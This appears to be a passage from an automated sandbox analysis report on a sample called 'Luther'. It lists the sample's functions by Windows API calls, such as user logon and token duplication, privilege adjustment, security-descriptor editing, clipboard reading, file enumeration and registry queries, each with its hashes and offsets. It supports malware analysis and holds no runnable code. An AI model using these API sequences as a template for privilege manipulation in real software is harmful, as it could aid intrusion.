                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_
                                                                                                          • String ID:
                                                                                                          • API String ID: 1144537725-0
                                                                                                          • Opcode ID: 2f4d4e7c9771ca75bfb1e3a13e1f9b8dbd55e93bf6ad02d97885be045720ae08
                                                                                                          • Instruction ID: f8240704c4ec67acba1aa896e34d68715d0c0a4feadd06adad2a3c244ac79acd
                                                                                                          • Opcode Fuzzy Hash: 2f4d4e7c9771ca75bfb1e3a13e1f9b8dbd55e93bf6ad02d97885be045720ae08
                                                                                                          • Instruction Fuzzy Hash: B6F037709143189FE7929F24DC4DBD57BFCB70170CF0040A9A644A6185D7755788CF51
                                                                                                          APIs
                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E33A76
                                                                                                            • Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongNamePath_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 541455249-0
                                                                                                          • Opcode ID: 1d0ec9d5662a36e50bd0cef8ab8cc97a771c660e8c94009df7bd5f875277410c
                                                                                                          • Instruction ID: 198be75bb5d61440374fedb884fc611ed4155bf5337b0a78adffcdbcf7a482e3
                                                                                                          • Opcode Fuzzy Hash: 1d0ec9d5662a36e50bd0cef8ab8cc97a771c660e8c94009df7bd5f875277410c
                                                                                                          • Instruction Fuzzy Hash: F5E0CD729002245BC71092589C05FDA77DDDFC8790F044075FD09E7254D961ED80C690
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,00E70A84,?,?,00000000,?,00E70A84,00000000,0000000C), ref: 00E70737
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 34b7ec76135c882b436d3cf0f42d868ddc19b40e938302df85d5ef4a1098b87d
                                                                                                          • Instruction ID: db73249d54b6de5aba0649beada98b81c1122afe46a296b5794a5e11cb3ea31a
                                                                                                          • Opcode Fuzzy Hash: 34b7ec76135c882b436d3cf0f42d868ddc19b40e938302df85d5ef4a1098b87d
                                                                                                          • Instruction Fuzzy Hash: 5FD06C3200010DBFDF028F85DD06EDA3BAAFB48714F014010BE5866020C732E822AB90
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,00E9D840), ref: 00E9EAB1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 577efb24877e8c1b1d36f8ca48d8e2f0d153ca8d872c421bc0da9870ae5d92e2
                                                                                                          • Instruction ID: a1688fa5279e670f54bef059ae5c6b01054fae96b3c400a6296dd5f00da47183
                                                                                                          • Opcode Fuzzy Hash: 577efb24877e8c1b1d36f8ca48d8e2f0d153ca8d872c421bc0da9870ae5d92e2
                                                                                                          • Instruction Fuzzy Hash: 8BB0923400460009AD284A385A0B999330079423A97DC2BD0E579A52F2C3BA980FA950
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E9DC54: FindFirstFileW.KERNEL32(?,?), ref: 00E9DCCB
                                                                                                            • Part of subcall function 00E9DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9DD1B
                                                                                                            • Part of subcall function 00E9DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E9DD2C
                                                                                                            • Part of subcall function 00E9DC54: FindClose.KERNEL32(00000000), ref: 00E9DD43
                                                                                                          • GetLastError.KERNEL32 ref: 00EA666E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 2191629493-0
                                                                                                          • Opcode ID: 9545c32554b55dd587de7ba39759ec69ab9a4ed262d4a489da582409f18e5b35
                                                                                                          • Instruction ID: 9cbe44b9e97845027909022d9fd70b200a10528aa848741a26cfb2e916ac73e2
                                                                                                          • Opcode Fuzzy Hash: 9545c32554b55dd587de7ba39759ec69ab9a4ed262d4a489da582409f18e5b35
                                                                                                          • Instruction Fuzzy Hash: A7F0A0362046109FCB10EF59D849F6EBBE5EF88720F048419F949AB352CB75BC02CB91
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E92010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9205A
                                                                                                            • Part of subcall function 00E92010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E92087
                                                                                                            • Part of subcall function 00E92010: GetLastError.KERNEL32 ref: 00E92097
                                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E91BD2
                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E91BF4
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E91C05
                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E91C1D
                                                                                                          • GetProcessWindowStation.USER32 ref: 00E91C36
                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00E91C40
                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E91C5C
                                                                                                            • Part of subcall function 00E91A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E91B48), ref: 00E91A20
                                                                                                            • Part of subcall function 00E91A0B: CloseHandle.KERNEL32(?,?,00E91B48), ref: 00E91A35
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                          • String ID: $default$winsta0$j
                                                                                                          • API String ID: 22674027-2615587742
                                                                                                          • Opcode ID: 7bc57d44630672c7dddbb64c26e4f26392f4c6f6e6a9bc94375b11e3ffda4d2e
                                                                                                          • Instruction ID: bcd33a45d64409473820ae09f669a0fceb40383dac691f187161027c117cf8f4
                                                                                                          • Opcode Fuzzy Hash: 7bc57d44630672c7dddbb64c26e4f26392f4c6f6e6a9bc94375b11e3ffda4d2e
                                                                                                          • Instruction Fuzzy Hash: F1819B7190520ABFDF119FA5CC49FEE7BB8EF08309F1450A9F914B61A0D772895ACB60
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E91A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91A60
                                                                                                            • Part of subcall function 00E91A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A6C
                                                                                                            • Part of subcall function 00E91A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A7B
                                                                                                            • Part of subcall function 00E91A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A82
                                                                                                            • Part of subcall function 00E91A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E91A99
                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E91518
                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E9154C
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00E91563
                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E9159D
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E915B9
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00E915D0
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E915D8
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00E915DF
                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E91600
                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00E91607
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E91636
                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E91658
                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E9166A
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E91691
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E91698
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E916A1
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E916A8
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E916B1
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E916B8
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E916C4
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E916CB
                                                                                                            • Part of subcall function 00E91ADF: GetProcessHeap.KERNEL32(00000008,00E914FD,?,00000000,?,00E914FD,?), ref: 00E91AED
                                                                                                            • Part of subcall function 00E91ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E914FD,?), ref: 00E91AF4
                                                                                                            • Part of subcall function 00E91ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E914FD,?), ref: 00E91B03
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 4175595110-0
                                                                                                          • Opcode ID: 77f9013f430a23a58159cead6be86329d2a6b4d1335572e2c6e9b68416763040
                                                                                                          • Instruction ID: ce5a59b58a4fd0e5d8a1017869ab7d99e1328ff50290590a5edfa0ecce9750fb
                                                                                                          • Opcode Fuzzy Hash: 77f9013f430a23a58159cead6be86329d2a6b4d1335572e2c6e9b68416763040
                                                                                                          • Instruction Fuzzy Hash: 62717BB290020AAFDF10DFA5DC45FEEBBB9BF04314F094565E915B6191D7329906CBA0
                                                                                                          APIs
                                                                                                          • OpenClipboard.USER32(00ECDCD0), ref: 00EAF586
                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EAF594
                                                                                                          • GetClipboardData.USER32(0000000D), ref: 00EAF5A0
                                                                                                          • CloseClipboard.USER32 ref: 00EAF5AC
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00EAF5E4
                                                                                                          • CloseClipboard.USER32 ref: 00EAF5EE
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00EAF619
                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00EAF626
                                                                                                          • GetClipboardData.USER32(00000001), ref: 00EAF62E
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00EAF63F
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00EAF67F
                                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 00EAF695
                                                                                                          • GetClipboardData.USER32(0000000F), ref: 00EAF6A1
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00EAF6B2
                                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00EAF6D4
                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EAF6F1
                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EAF72F
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00EAF750
                                                                                                          • CountClipboardFormats.USER32 ref: 00EAF771
                                                                                                          • CloseClipboard.USER32 ref: 00EAF7B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 420908878-0
                                                                                                          • Opcode ID: 01be18d2b5653c5db58e8e177dd44bb39bcdc9db5e15139943379a2e2f4001e4
                                                                                                          • Instruction ID: 310b75c0314675d25b9eefbacea5002700f50cfc994ddea82658875cc34113f6
                                                                                                          • Opcode Fuzzy Hash: 01be18d2b5653c5db58e8e177dd44bb39bcdc9db5e15139943379a2e2f4001e4
                                                                                                          • Instruction Fuzzy Hash: 2561A5351042019FD300EF61DC89F6ABBE4AF89708F14557DF446AB2A2DB32ED4ACB61
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EA7403
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EA7457
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EA7493
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EA74BA
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA74F7
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA7524
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                          • API String ID: 3830820486-3289030164
                                                                                                          • Opcode ID: 51b28b0cefce68645718d8422273a2a59c6346871293ce1df83b6286206d7f48
                                                                                                          • Instruction ID: fb9f51b70b20a687c4e25f6bd83500652b4970189ca0132a387eefaf426d0960
                                                                                                          • Opcode Fuzzy Hash: 51b28b0cefce68645718d8422273a2a59c6346871293ce1df83b6286206d7f48
                                                                                                          • Instruction Fuzzy Hash: DFD16172508304AEC314EB64CC45EBBBBECAF88704F40592DF589E6291EB75EA44C762
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00EAA0A8
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00EAA0E6
                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00EAA100
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EAA118
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAA123
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00EAA13F
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EAA18F
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00EF7B94), ref: 00EAA1AD
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAA1B7
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAA1C4
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAA1D4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1409584000-438819550
                                                                                                          • Opcode ID: 68ed5d4b854c6e8453ff9f572e83cf72b98bbe756a6fab1c185d6a2ca1934250
                                                                                                          • Instruction ID: ab00958f42df2c67075e1fa5d9b3029344ad6947de72b790ab8049a6dbb6d51f
                                                                                                          • Opcode Fuzzy Hash: 68ed5d4b854c6e8453ff9f572e83cf72b98bbe756a6fab1c185d6a2ca1934250
                                                                                                          • Instruction Fuzzy Hash: 8131F47260531D7EDB14AFA5DC49EDE77AC9F1A324F0410B5E810F6090EB71EE49CA51
                                                                                                          APIs
                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EA4785
                                                                                                          • _wcslen.LIBCMT ref: 00EA47B2
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EA47E2
                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EA4803
                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00EA4813
                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EA489A
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EA48A5
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EA48B0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                          • String ID: :$\$\??\%s
                                                                                                          • API String ID: 1149970189-3457252023
                                                                                                          • Opcode ID: e61eb8f0241e655de5d6cf5033cb48e4cb1cf7a3b475858c9e88d7265dd3d5f7
                                                                                                          • Instruction ID: 64752d8202feb326a5f0e4b955c5a1f297292b23d0f358ecaa8f271b533537c0
                                                                                                          • Opcode Fuzzy Hash: e61eb8f0241e655de5d6cf5033cb48e4cb1cf7a3b475858c9e88d7265dd3d5f7
                                                                                                          • Instruction Fuzzy Hash: F531E5B1504149AFDB209BA4DC44FEF33BCEF89705F1040B6F509F60A0E7B596458B20
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00EAA203
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EAA25E
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAA269
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00EAA285
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EAA2D5
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00EF7B94), ref: 00EAA2F3
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAA2FD
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAA30A
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAA31A
                                                                                                            • Part of subcall function 00E9E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E9E3B4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 2640511053-438819550
                                                                                                          • Opcode ID: 9159f3370cd9165959cdffde77f5bfe72f02068f0e81011e2c0a2fb7b56dd6a6
                                                                                                          • Instruction ID: 1d94ae52dda4d483f98973cb76a1d034235bb783532072a3a67570efa3182306
                                                                                                          • Opcode Fuzzy Hash: 9159f3370cd9165959cdffde77f5bfe72f02068f0e81011e2c0a2fb7b56dd6a6
                                                                                                          • Instruction Fuzzy Hash: 9631F83250431D6ECF10AFA5DC09EDE77AD9F4A324F1451B5E810B71A0EB32EE99CA61
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBC10E,?,?), ref: 00EBD415
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD451
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4C8
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4FE
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC99E
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00EBCA09
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EBCA2D
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EBCA8C
